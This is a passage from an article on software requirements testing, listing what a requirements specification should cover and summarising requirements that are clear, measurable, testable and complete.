irrelevant requirement. Ask the stakeholders if they really want to implement these types of
requirements.
In short requirements specification (SRS) doc should address following:
Project functionality (What should be done and what should not)
Software, Hardware interfaces and user interface
System Correctness, Security and performance criteria
Implementation issues (risks) if any
Conclusion:
I have covered all aspects of requirement measurement. To be specific about requirements,
I will summarize requirement testing in one sentence:
“Requirements should be clear and specific with no uncertainty, requirements
should be measurable in terms of specific values, requirements should be testable
having some evaluation criteria for each requirement, and requirements should be
complete, without any contradictions”
Testing should start at requirement phase to avoid further requirement related bugs.
Communicate more and more with your stakeholder to clarify all the requirements before
starting project design and implementation.